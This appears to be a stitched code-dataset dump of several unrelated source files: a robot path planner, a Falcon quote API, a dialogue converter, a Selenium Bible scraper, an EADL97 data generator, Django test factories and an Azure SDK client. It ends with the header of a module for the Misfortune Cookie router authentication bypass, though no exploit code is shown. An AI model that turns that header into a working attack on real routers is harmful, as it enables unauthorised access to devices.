plt.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
plt.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
self.ax.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
self.ax.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
self.ax.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
#return V, E, and the current node number on the tree
V = array(V)
return V, E, 0
def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
"""
Generate a new node on the current tree matrix
V : the node matrix
V_theta : the orientation matrix
E : the tree matrix (or edge matrix)
Other : the matrix containing the velocity and angular velocity(omega) information
regionPoly: the polygon of current region
stuck : count on the number of times failed to generate new node
append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)
"""
if self.system_print == True:
print "In control space generating path,stuck = " + str(stuck)
connection_to_tree = False # True when connection to the tree is successful
if stuck > self.stuck_thres:
# increase the range of omega since a path cannot be generated
omega = random.choice(self.omega_range_escape)
else:
#!!!! CONTROL SPACE STEP 1 - generate random omega
omega = random.choice(self.omega_range)
#!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
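# Expansion point: the newest node when append_after_latest_node is set, otherwise a 50/50 choice between a random existing node and the newest node.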
if append_after_latest_node:
tree_index = shape(V)[1]-1
else:
if random.choice([1,2]) == 1:
tree_index = random.choice(array(V[0])[0])
else:
tree_index = shape(V)[1]-1
xPrev = V[1,tree_index]
yPrev = V[2,tree_index]
thetaPrev = V_theta[tree_index]
j = 1
#!!!! CONTROL SPACE STEP 3 - Check path of the robot
path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
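# Forward-integrate the unicycle model for self.timeStep unit steps (x += v/omega*(sin(omega + theta) - sin(theta)), y -= v/omega*(cos(omega + theta) - cos(theta)), theta += omega), sweeping a robot-sized circle at each step.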
while j <= self.timeStep:
xOrg = xPrev
yOrg = yPrev
xPrev = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
yPrev = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
thetaPrev = omega* 1 + thetaPrev
path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))
j = j + 1
thetaPrev = self.orientation_bound(thetaPrev)
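# Approximate the swept footprint by the convex hull of the sampled circles; the candidate motion is only valid if the region polygon fully covers it.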
path_all = PolyUtils.convexHull(path_robot)
in_bound = regionPoly.covers(path_all)
"""
# plotting
if plotting == True:
self.plotPoly(path_all,'r',1)
"""
stuck = stuck + 1
if in_bound:
robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
# check how many nodes on the tree the new node overlaps with
nodes_overlap_count = 0
for k in range(shape(V)[1]-1):
robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
if robot_new_node.overlaps(robot_old_node):
if abs(thetaPrev - V_theta[k]) < self.max_angle_overlap:
nodes_overlap_count += 1
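# Accept the new node if it overlaps no existing node with a similar heading; once stuck passes the threshold the overlap requirement is progressively relaxed so the tree can keep growing.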
if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
if stuck > self.stuck_thres+1:
append_after_latest_node = False
if (stuck > self.stuck_thres+500):
stuck = 0
stuck = stuck - 20
# plotting
if self.plotting == True:
self.plotPoly(path_all,'b',1)
if self.system_print == True:
print "node connected"
V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
V_theta = hstack((V_theta,thetaPrev))
E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
Other = hstack((Other,vstack((self.velocity,omega))))
##################### E should add omega and velocity
connection_to_tree = True
append_after_latest_node = True
else:
append_after_latest_node = False
if self.system_print == True:
print "node not connected. check goal point"
else:
append_after_latest_node = False
return V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree
def orientation_bound(self,theta):
"""
make sure the returned angle is between 0 and 2*pi
"""
while theta > 2*pi or theta < 0:
if theta > 2*pi:
theta = theta - 2*pi
else:
theta = theta + 2*pi
return theta
def plotMap(self,mappedRegions):
"""
Plotting regions and obstacles with matplotlib.pyplot
number: figure number (see on top)
"""
#if not plt.isinteractive():
# plt.ion()
#plt.hold(True)
if self.operate_system == 1:
for regionName,regionPoly in mappedRegions.iteritems():
self.plotPoly(regionPoly,'k')
plt.figure(1).canvas.draw()
def plotPoly(self,c,string,w = 1):
"""
Plot polygons inside the boundary
c = polygon to be plotted with matplotlib
string = string that specify color
w = width of the line plotting
"""
if bool(c):
for i in range(len(c)):
#toPlot = Polygon.Polygon(c.contour(i))
toPlot = Polygon.Polygon(c.contour(i)) & self.all
if bool(toPlot):
for j in range(len(toPlot)):
#BoundPolyPoints = asarray(PolyUtils.pointList(toPlot.contour(j)))
BoundPolyPoints = asarray(PolyUtils.pointList(Polygon.Polygon(toPlot.contour(j))))
if self.operate_system == 2:
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
self.ax.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
else:
plt.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
plt.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
plt.figure(1).canvas.draw()
def data_gen(self):
#self.ax.cla()
for regionName,regionPoly in self.map.iteritems():
self.plotPoly(regionPoly,'k')
"""
#for i in range(len(self.V)):
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.plotPoly(self.realRobot, 'r')
self.plotPoly(self.robot, 'b')
"""
pose = self.pose_handler.getPose()
self.ax.plot(pose[0],pose[1],'bo')
"""
self.ax.plot(self.q_g[0],self.q_g[1],'ro')
self.plotPoly(self.overlap,'g')
self.plotPoly(self.m_line,'b')
"""
yield(pose[0],pose[1])
"""
self.ax.plot(self.prev_follow[0],self.prev_follow[1],'ko')
"""
def jplot(self):
ani = animation.FuncAnimation(self.fig, self.scope.update, self.data_gen)
plt.show()
class _Scope:
def __init__(self, ax, motion, maxt=2, dt=0.02):
self.i = 0
self.ax = ax
self.line, = self.ax.plot(1)
self.ax.set_ylim(0, 1)
self.motion = motion
def update(self,data):
(data1) = self.motion.data_gen()
a = data1.next()
self.line.set_data(a)
self.ax.relim()
self.ax.autoscale()
return self.line,
| gpl-3.0 | -7,881,769,386,482,705,000 | 45.484655 | 300 | 0.529798 | false |
conda/kapsel | examples/quote_api/quote.py | 1 | 4575 | from argparse import ArgumentParser
import falcon
import gunicorn.app.base
import json
import multiprocessing
import sys
# A Falcon resource that returns the same quote every time
class QuoteResource(object):
def on_get(self, req, resp):
"""Handles GET requests"""
quote = {'quote': 'I\'ve always been more interested in the future than in the past.', 'author': 'Grace Hopper'}
resp.body = json.dumps(quote)
# A Falcon resource that explains what this server is
class IndexResource(object):
def __init__(self, prefix):
self.prefix = prefix
def on_get(self, req, resp):
"""Handles GET requests"""
resp.body = """
<html>
<head>
<title>Quote API Server</title>
</head>
<body>
<p>This is a toy JSON API server example.</p>
<p>Make a GET request to <a href="%s/quote">%s/quote</a></p>
</body>
</html>
""" % (self.prefix, self.prefix)
resp.content_type = "text/html"
resp.status = falcon.HTTP_200
# A Falcon middleware to implement validation of the Host header in requests
class HostFilter(object):
def __init__(self, hosts):
# falcon strips the port out of req.host, even if it isn't 80.
# This is probably a bug in Falcon, so we work around it here.
self.hosts = [falcon.util.uri.parse_host(host)[0] for host in hosts]
def process_request(self, req, resp):
# req.host has the port stripped from what the browser
# sent us, even when it isn't 80, which is probably a bug
# in Falcon. We deal with that in __init__ by removing
# ports from self.hosts.
if req.host not in self.hosts:
print("Attempted request with Host header '%s' denied" % req.host)
raise falcon.HTTPForbidden("Bad Host header", "Cannot connect via the provided hostname")
# the gunicorn application
class QuoteApplication(gunicorn.app.base.BaseApplication):
def __init__(self, port, prefix, hosts):
assert prefix is not None
assert port is not None
self.application = falcon.API(middleware=HostFilter(hosts))
# add_route is pedantic about this
if prefix != '' and not prefix.startswith("/"):
prefix = "/" + prefix
self.application.add_route(prefix + '/quote', QuoteResource())
self.application.add_route(prefix + "/", IndexResource(prefix))
self.port = port
super(QuoteApplication, self).__init__()
print("Only connections via these hosts are allowed: " + repr(hosts))
print("Starting API server. Try http://localhost:%s%s" % (self.port, prefix + '/quote'))
def load_config(self):
# Note that --kapsel-host is NOT this address; it is NOT
# the address to listen on. --kapsel-host specifies the
# allowed values of the Host header in an http request,
# which is totally different. Another way to put it is
# that --kapsel-host is the public hostname:port browsers will
# be connecting to.
self.cfg.set('bind', '%s:%s' % ('0.0.0.0', self.port))
self.cfg.set('workers', (multiprocessing.cpu_count() * 2) + 1)
def load(self):
return self.application
# arg parser for the standard kapsel options
parser = ArgumentParser(prog="quote-api", description="API server that returns a quote.")
parser.add_argument('--kapsel-host', action='append', help='Hostname to allow in requests')
parser.add_argument('--kapsel-no-browser', action='store_true', default=False, help='Disable opening in a browser')
parser.add_argument('--kapsel-use-xheaders',
action='store_true',
default=False,
help='Trust X-headers from reverse proxy')
parser.add_argument('--kapsel-url-prefix', action='store', default='', help='Prefix in front of urls')
parser.add_argument('--kapsel-port', action='store', default='8080', help='Port to listen on')
parser.add_argument('--kapsel-iframe-hosts',
action='append',
help='Space-separated hosts which can embed us in an iframe per our Content-Security-Policy')
if __name__ == '__main__':
# This app accepts but ignores --kapsel-no-browser because we never bother to open a browser,
# and accepts but ignores --kapsel-iframe-hosts since iframing an API makes no sense.
args = parser.parse_args(sys.argv[1:])
if not args.kapsel_host:
args.kapsel_host = ['localhost:' + args.kapsel_port]
QuoteApplication(port=args.kapsel_port, prefix=args.kapsel_url_prefix, hosts=args.kapsel_host).run()
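# Hypothetical example invocation: python quote.py --kapsel-port 8080 --kapsel-url-prefix /api --kapsel-host localhost:8080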
| bsd-3-clause | -1,188,982,769,034,152,700 | 41.757009 | 120 | 0.65071 | false |
parpg/parpg | tools/utilities/convert_dialogue.py | 1 | 3506 | #!/usr/bin/env python
"""Convert YAML dialogue files from the Techdemo1 format to the new Techdemo2
format.
@author: M. George Hansen <[email protected]>
"""
import os.path
import sys
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import shutil
import logging
from optparse import OptionParser
from parpg.dialogueparsers import (OldYamlDialogueParser, YamlDialogueParser,
DialogueFormatError)
def backup_file(filepath):
dirpath = os.path.dirname(filepath)
filename = os.path.basename(filepath)
shutil.copy2(filepath, os.path.join(dirpath,
'.'.join([filename, 'backup'])))
def convert_dialogue_file(filepath, backup):
logging.info('processing {0}...'.format(filepath))
dummy, extension = os.path.splitext(filepath)
if (not extension == '.yaml'):
logging.info(' skipping {0}: not a yaml file'.format(filepath))
return 1
with file(filepath, 'r') as dialogue_file:
old_parser = OldYamlDialogueParser()
new_parser = YamlDialogueParser()
try:
dialogue = old_parser.load(dialogue_file)
except DialogueFormatError as error:
logging.info(
' unable to convert {0}: unrecognized dialogue format'
.format(filepath)
)
return 1
if (backup):
backup_file(filepath)
logging.info(' backed up {0} as {0}.backup'.format(filepath))
with file(filepath, 'w') as dialogue_file:
new_parser.dump(dialogue, dialogue_file)
logging.info(' successfully converted {0}!'.format(filepath))
usage_message = '''\
usage: convert_dialogue.py [-h] [-n] [-v] [-q] file_or_dir
Convert YAML dialogue files written in Techdemo1 syntax to the new Techdemo2
syntax.
If the file_or_dir argument is a directory, then this script will attempt to
convert all .yaml files in the directory that contain valid dialogues.
By default all processed files are first backed up by adding a ".backup" suffix
to the filename + extension. Backups can be disabled by passing the -n option
to the script.
'''
def main(argv=sys.argv):
# Options.
backup = True
logging_level = logging.WARNING
parser = OptionParser(usage=usage_message,
description="Convert YAML dialogue files written "
"in Techdemo1 syntax to the new "
"Techdemo2 syntax.")
parser.add_option('-n', '--no-backup', action='store_false', dest='backup', default=True)
parser.add_option('-v', '--verbose', action='count', default=0)
parser.add_option('-q', '--quiet', action='count', default=0)
opts, args = parser.parse_args()
backup = opts.backup
verbosity = opts.verbose * 10
quietness = - (opts.quiet * 10)
logging_level += (verbosity + quietness)
logging.basicConfig(format='%(message)s', level=logging_level)
try:
path = args[0]
except IndexError:
parser.print_help()
sys.exit(1)
if (os.path.isdir(path)):
for filepath in os.listdir(path):
qualified_filepath = os.path.join(path, filepath)
if (not os.path.isfile(qualified_filepath)):
continue
convert_dialogue_file(qualified_filepath, backup=backup)
else:
convert_dialogue_file(path, backup=backup)
if __name__ == '__main__':
main()
| gpl-3.0 | 1,915,518,116,129,695,200 | 34.77551 | 79 | 0.617513 | false |
hoaibang07/Webscrap | transcripture/sources/crawler_chuongthieu.py | 1 | 7017 | # -*- encoding: utf-8 -*-
import io
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
import urllib2
import urlparse
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os.path
zenmatePath = "/home/hbc/.mozilla/firefox/yeyuaq0s.default/extensions/[email protected]"
ffprofile = webdriver.FirefoxProfile()
# ffprofile.set_preference("javascript.enabled", False)
# ffprofile.set_preference('permissions.default.image', 2)
# ffprofile.set_preference('permissions.default.stylesheet', 2)
# ffprofile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
ffprofile.add_extension(zenmatePath)
ffprofile.add_extension('/home/hbc/Downloads/quickjava-2.0.6-fx.xpi')
ffprofile.set_preference("thatoneguydotnet.QuickJava.curVersion", "2.0.6.1") ## Prevents loading the 'thank you for installing screen'
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Images", 2) ## Turns images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.AnimatedImage", 2) ## Turns animated images off
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.CSS", 2) ## CSS
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Cookies", 2) ## Cookies
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Flash", 2) ## Flash
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Java", 2) ## Java
# ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.JavaScript", 2) ## JavaScript
ffprofile.set_preference("thatoneguydotnet.QuickJava.startupStatus.Silverlight", 2) ## Silverlight
driver = webdriver.Firefox(ffprofile)
def _remove_div_vdx(soup):
for div in soup.find_all('div', class_='vidx'):
div.extract()
return soup
def get_data(urlchuong_list, i):
filename = 'urlsach/data/bosung/sach' + str(i) + '.txt'
ftmp = io.open(filename, 'w', encoding='utf-8')
try:
# hdrs = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Connection': 'keep-alive',
# 'Cookie': 'ipq_lip=20376774; ipq_set=1453874029; __atuvc=2%7C4; __utma=126044488.676620502.1453787537.1453787537.1453787537.1; __utmz=126044488.1453787537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ed3f4874b92a29b6ed036adfa5ad6fb3; ipcountry=us',
# 'Host': 'www.transcripture.com',
# 'Referer': 'http://www.transcripture.com/vietnamese-spanish-genesis-1.html',
# 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0'
# }
count = 1
for urlchuong in urlchuong_list:
print('Fetching chapter %d, book %d' % (count, i))
# urlchuong = 'http://www.transcripture.com/vietnamese-chinese-revelation-3.html'
# print urlchuong
# # create request
# req = urllib2.Request(urlchuong, headers=hdrs)
# # get response
# response = urllib2.urlopen(req)
# soup = BeautifulSoup(response.read())
# Load a page
driver.get(urlchuong)
# delay = 40 # seconds
# try:
# wait = WebDriverWait(driver, delay)
# path = '/html/body/center/div[1]/div[2]/div[4]/table/tbody/tr[2]/td[1]/div/div[1]/form[1]/select/option[66]'
# elem = driver.find_element_by_xpath(path)
# wait.until(EC.visibility_of(elem))
# print "Page is ready!"
# except TimeoutException:
# print "Loading took too much time!"
# #reload page
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.ESCAPE)
# body.send_keys(Keys.F5)
content = driver.page_source
soup = BeautifulSoup(content)
soup = _remove_div_vdx(soup)
# print soup
table_tag = soup.find_all('table', attrs={'width':'100%', 'cellspacing':'0'})[0]
tr_tags = table_tag.find_all('tr')
_len = len(tr_tags)
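# The first table row carries the two language headings (h2.cphd); the remaining rows carry the paired verse text, serialised with '|' separators.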
# in first tr tag:
h2_class = tr_tags[0].find_all('h2', class_='cphd')
ftmp.write(u'' + h2_class[0].get_text() + '|')
ftmp.write(u'' + h2_class[1].get_text() + '\n')
# print table_tag
for x in xrange(1,_len):
data = tr_tags[x].get_text('|')
# print data
# url_ec = url.encode('unicode','utf-8')
ftmp.write(u'' + data + '\n')
count = count + 1
# close file
ftmp.close()
except Exception, e:
print e
# close file
ftmp.close()
def check_numline(filename):
urlsach_list = []
urlsach_file = open(filename, 'r')
for line in urlsach_file:
urlsach_list.append(line.strip())
_len = len(urlsach_list)
return _len
def getsttchuongthieu(sachi):
list_stt = []
urlsach = 'urlsach/sach' + str(sachi) + '.txt'
# check the number of lines in the book URL file, which corresponds to the number of chapters
numline = check_numline(urlsach)
fname = 'urlsach/data/partcomplete/sach' + str(sachi) + '.txt'
#doc data tu file sach data
data = open(fname).read()
# check whether each of these chapter numbers already appears in the book data file
for i in xrange(1,numline + 1):
key = str(i)
# print ('da chay den day')
if key not in data:
list_stt.append(i)
return list_stt
def getlisturlchuongthieu(sachi):
list_chuongthieu = []
list_stt = getsttchuongthieu(sachi)
fname = 'urlsach/sach' + str(sachi) + '.txt'
fp = open(fname)
lines=fp.readlines()
for stt in list_stt:
list_chuongthieu.append(lines[stt-1])
return list_chuongthieu
def main():
for x in xrange(1,67):
# check whether the file exists in the partcomplete directory
f2name = 'urlsach/data/partcomplete/sach' + str(x) + '.txt'
if os.path.isfile(f2name):
list_urlchuongthieu = getlisturlchuongthieu(x)
get_data(list_urlchuongthieu, x)
if __name__ == '__main__':
# driver = webdriver.Firefox()
driver.get("about:blank")
# open new tab
# body = driver.find_element_by_tag_name("body")
# body.send_keys(Keys.CONTROL + 't')
# time.sleep(15)
print('Enter any character to continue the program')
key = raw_input()
main()
# close the tab
driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 'w')
driver.close()
# urlchuong_list = ['http://www.transcripture.com/vietnamese-chinese-exodus-1.html']
# get_data(urlchuong_list, 2) | gpl-2.0 | -8,064,880,054,819,888,000 | 35.936842 | 282 | 0.619353 | false |
tonnrueter/pymca_devel | PyMca/EPDL97/GenerateEADLShellNonradiativeRates.py | 1 | 6235 | __doc__= "Generate specfiles with EADL97 shell transition probabilities"
import os
import sys
import EADLParser
Elements = ['H', 'He',
'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne',
'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe',
'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo',
'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn',
'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce',
'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy',
'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb',
'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th',
'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf',
'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt']
def getHeader(filename):
text = '#F %s\n' % filename
text += '#U00 This file is a conversion to specfile format of \n'
text += '#U01 directly extracted EADL97 nonradiative transition probabilities.\n'
text += '#U02 EADL itself can be found at:\n'
text += '#U03 http://www-nds.iaea.org/epdl97/libsall.htm\n'
text += '#U04 The code used to generate this file has been:\n'
text += '#U05 %s\n' % os.path.basename(__file__)
text += '#U06\n'
text += '\n'
return text
shellList = EADLParser.getBaseShellList()
workingShells = ['K', 'L1', 'L2', 'L3', 'M1', 'M2', 'M3', 'M4', 'M5']
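# A vacancy in the shell being processed can only be filled from deeper (sub)shells, which is why the loops below skip any shell whose index does not lie past the current one.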
for shell in workingShells:
fname = "EADL97_%sShellNonradiativeRates.dat" % shell[0]
print("fname = %s" % fname)
if shell in ['K', 'L1', 'M1']:
if os.path.exists(fname):
os.remove(fname)
nscan = 0
outfile = open(fname, 'wb')
tmpText = getHeader(fname)
if sys.version < '3.0':
outfile.write(tmpText)
else:
outfile.write(tmpText.encode('UTF-8'))
nscan += 1
for i in range(1,101):
print("Z = %d, Element = %s" % (i, Elements[i-1]))
element = Elements[i-1]
ddict = {}
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
if shell in [key0.split()[0], key1.split()[0]]:
continue
ddict[key] = [0.0, 0.0]
try:
ddict = EADLParser.getNonradiativeTransitionProbabilities(\
Elements.index(element)+1,
shell=shell)
print("%s Shell nonradiative emission probabilities " % shell)
except IOError:
#This happens when reading elements that do not present these transitions
pass
#continue
if i == 1:
#generate the labels
nTransitions = 0
tmpText = '#L Z TOTAL'
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
tmpText += ' %s' % (key)
nTransitions += 1
text = '#S %d %s-Shell nonradiative rates\n' % (nscan, shell)
text += '#N %d\n' % (2 + nTransitions)
text += tmpText + '\n'
else:
text = ''
# this loop calculates the totals, because it cannot be deduced from the subset
# transitions written in the file
total = 0.0
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
total += ddict.get(key, [0.0, 0.0])[0]
text += '%d %.7E' % (i, total)
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
valueToWrite = ddict.get(key, [0.0, 0.0])[0]
if valueToWrite == 0.0:
text += ' 0.0'
else:
text += ' %.7E' % valueToWrite
text += '\n'
if sys.version < '3.0':
outfile.write(text)
else:
outfile.write(text.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
outfile.close()
| gpl-2.0 | 4,806,273,130,956,564,000 | 42.601399 | 87 | 0.455654 | false |
mangaki/mangaki | mangaki/mangaki/factories.py | 1 | 1591 | import factory
from factory.django import DjangoModelFactory, mute_signals
from .models import Profile, Work, Category
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class ProfileFactory(DjangoModelFactory):
class Meta:
model = Profile
user = factory.SubFactory('mangaki.factories.UserFactory', profile=None)
mal_username = factory.Faker('user_name')
is_shared = factory.Faker('boolean')
nsfw_ok = factory.Faker('boolean')
newsletter_ok = factory.Faker('boolean')
avatar_url = factory.LazyAttribute(lambda o: '{}{}.png'.format(factory.Faker('url').generate({}), o.mal_username))
@mute_signals(post_save)
class UserFactory(DjangoModelFactory):
class Meta:
model = User
username = factory.Faker('user_name')
email = factory.LazyAttribute(lambda o: '{}@mangaki.fr'.format(o.username))
profile = factory.RelatedFactory(ProfileFactory, 'user')
class WorkFactory(DjangoModelFactory):
class Meta:
model = Work
category = factory.Iterator(Category.objects.all())
@factory.iterator
def title():
qs = Work.objects.values_list('title', flat=True).all()[:20]
for title in qs:
yield title
nsfw = factory.Faker('boolean')
synopsis = factory.Faker('text')
def create_user(**kwargs):
return UserFactory.create(**kwargs)
def create_user_with_profile(**kwargs):
profile = kwargs.pop('profile')
user = create_user(**kwargs)
for key, value in profile.items():
setattr(user.profile, key, value)
return user
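# Example usage (hypothetical values):
# user = create_user_with_profile(username='alice',
# profile={'mal_username': 'alice', 'nsfw_ok': True})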
| agpl-3.0 | -2,614,688,259,151,753,700 | 29.018868 | 118 | 0.688875 | false |
Azure/azure-sdk-for-python | sdk/databoxedge/azure-mgmt-databoxedge/azure/mgmt/databoxedge/v2019_08_01/operations/_jobs_operations.py | 1 | 4882 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class JobsOperations(object):
"""JobsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.databoxedge.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
device_name, # type: str
name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Job"
"""Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
:param device_name: The device name.
:type device_name: str
:param name: The job name.
:type name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Job, or the result of cls(response)
:rtype: ~azure.mgmt.databoxedge.v2019_08_01.models.Job
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Job"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Job', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/jobs/{name}'} # type: ignore
| mit | -2,191,556,967,445,919,200 | 43.381818 | 188 | 0.65383 | false |
j91321/rext | modules/exploits/allegrosoft/misfortune_auth_bypass.py | 1 | 22767 | # Name:Misfortune Cookie vulnerability authentication bypass
# File:misfortune_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 22.9.2016
# Description: PoC based on 31C3 presentation,
